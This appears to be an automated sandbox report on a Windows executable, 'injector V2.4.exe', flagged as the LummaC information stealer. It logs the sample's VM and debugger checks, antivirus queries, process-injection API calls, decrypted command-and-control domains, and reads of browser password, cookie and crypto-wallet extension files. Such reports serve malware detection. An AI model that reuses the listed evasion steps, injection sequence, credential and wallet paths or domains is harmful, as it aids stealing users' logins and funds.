Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: injector V2.4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE

Source: injector V2.4.exe	Static PE information: section name: .00cfg
Source: injector V2.4.exe	Static PE information: section name: .coS

Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B500FA push ecx; ret	0_2_00B5010D
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B500FA push ecx; ret	3_2_00B5010D
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_0054164C push ebp; ret	4_3_00541650
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_0054164C push ebp; ret	4_3_00541650
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_0052F5BD push edi; retf	4_3_0052F5BF
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_0052F5BD push edi; retf	4_3_0052F5BF
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00546842 push ecx; retf	4_3_00546868
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00546842 push ecx; retf	4_3_00546868
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00546842 push ecx; retf	4_3_00546868
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_0054164C push ebp; ret	4_3_00541650
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_0054164C push ebp; ret	4_3_00541650
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00535C19 push eax; retf 0002h	4_3_00535C1A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00537401 push ebp; iretd	4_3_00537402
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_0052F5BD push edi; retf	4_3_0052F5BF
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 4_3_00546842 push ecx; retf	4_3_00546868

Source: injector V2.4.exe

Static PE information: section name: .text entropy: 6.9570693373870895

Source: C:\Users\user\Desktop\injector V2.4.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\injector V2.4.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\injector V2.4.exe TID: 2212	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe TID: 2212	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\injector V2.4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B4F680 FindFirstFileExW,	0_2_00B4F680
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00B4F731
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B4F680 FindFirstFileExW,	3_2_00B4F680
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B4F731 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00B4F731

Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004F05000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: injector V2.4.exe, 00000004.00000002.2254512158.000000000049C000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2253728589.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004C9000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000003.2253728589.000000000049C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004F05000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: injector V2.4.exe, 00000004.00000003.2123229633.0000000004EFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\injector V2.4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 4_2_0043E480 LdrInitializeThunk,

4_2_0043E480

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 0_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00B496AF

Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B5D18D mov edi, dword ptr fs:[00000030h]	0_2_00B5D18D
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2D475 mov edi, dword ptr fs:[00000030h]	0_2_00B2D475
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2D07E mov edi, dword ptr fs:[00000030h]	0_2_00B2D07E
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B32C40 mov eax, dword ptr fs:[00000030h]	0_2_00B32C40
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B32C40 mov eax, dword ptr fs:[00000030h]	0_2_00B32C40
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2CD0A mov edi, dword ptr fs:[00000030h]	0_2_00B2CD0A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2E93A mov edi, dword ptr fs:[00000030h]	0_2_00B2E93A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2CD0A mov edi, dword ptr fs:[00000030h]	0_2_00B2CD0A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2D6B8 mov edi, dword ptr fs:[00000030h]	0_2_00B2D6B8
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2D6B8 mov edi, dword ptr fs:[00000030h]	0_2_00B2D6B8
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2DA6C mov edi, dword ptr fs:[00000030h]	0_2_00B2DA6C
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B32B9B mov eax, dword ptr fs:[00000030h]	0_2_00B32B9B
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B32B9B mov eax, dword ptr fs:[00000030h]	0_2_00B32B9B
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B2E350 mov edi, dword ptr fs:[00000030h]	0_2_00B2E350
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]	3_2_00B32AA0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]	3_2_00B32AA0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]	3_2_00B32AA0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]	3_2_00B32AA0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B32AA0 mov eax, dword ptr fs:[00000030h]	3_2_00B32AA0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]	3_2_00B2CCC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]	3_2_00B2CCC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]	3_2_00B2CCC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]	3_2_00B2CCC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]	3_2_00B2CCC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]	3_2_00B2CCC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]	3_2_00B2CCC0
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B2CCC0 mov edi, dword ptr fs:[00000030h]	3_2_00B2CCC0

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 0_2_00B4CB10 GetProcessHeap,

0_2_00B4CB10

Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B4902F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B4902F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B496A3 SetUnhandledExceptionFilter,	0_2_00B496A3
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B496AF
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 0_2_00B4B79A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B4B79A
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B4902F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00B4902F
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B496A3 SetUnhandledExceptionFilter,	3_2_00B496A3
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B496AF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00B496AF
Source: C:\Users\user\Desktop\injector V2.4.exe	Code function: 3_2_00B4B79A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00B4B79A

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 0_2_00B5D18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00B5D18D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\injector V2.4.exe

Memory written: C:\Users\user\Desktop\injector V2.4.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: p3ar11fter.sbs
Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 3xp3cts1aim.sbs
Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: peepburry828.sbs
Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: p10tgrace.sbs
Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: processhol.sbs
Source: injector V2.4.exe, 00000000.00000002.2053404503.0000000000999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: fumblingactor.cyou

Source: C:\Users\user\Desktop\injector V2.4.exe	Process created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"			Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	Process created: C:\Users\user\Desktop\injector V2.4.exe "C:\Users\user\Desktop\injector V2.4.exe"			Jump to behavior

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 0_2_00B498D5 cpuid

0_2_00B498D5

Source: C:\Users\user\Desktop\injector V2.4.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\injector V2.4.exe

Code function: 0_2_00B49566 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00B49566

Source: C:\Users\user\Desktop\injector V2.4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: injector V2.4.exe, 00000004.00000003.2253728589.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, injector V2.4.exe, 00000004.00000002.2254512158.00000000004B2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\injector V2.4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: injector V2.4.exe PID: 1492, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\injector V2.4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
